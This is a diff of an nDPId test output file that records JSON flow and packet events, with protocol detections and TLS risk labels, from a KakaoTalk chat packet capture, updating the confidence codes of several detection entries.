+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} @@ -180,59 +180,59 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 